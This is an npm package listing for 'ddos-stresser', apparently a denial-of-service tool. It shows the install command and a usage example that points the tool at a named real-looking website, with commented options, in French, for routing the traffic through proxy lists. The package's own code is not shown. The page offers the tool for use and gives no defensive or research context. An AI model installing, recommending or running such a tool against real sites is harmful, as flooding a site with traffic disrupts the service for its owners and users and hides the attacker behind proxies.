ddos-stresser

1.0.2 • Public • Published

Ddos Stresser

ddos-stresser on npm

Installation

npm i ddos-stresser

Example

const { start } = require("../");

start(
    {
        debug: true,
        url: "https://searchdata.fr",
        // AVEC PROXY
        // proxy: ["ip", "http://ip:port"]
        // OU
        // proxy: "./proxy.txt"
    },
    (err, ping) => {
        if (err) return console.log(err);
        console.log(ping);
    }) 

Readme

Keywords

Package Sidebar

Install

npm i ddos-stresser

Weekly Downloads

2

Version

1.0.2

License

ISC

Unpacked Size

4.64 kB

Total Files

4

Last publish

Collaborators

  • zougataga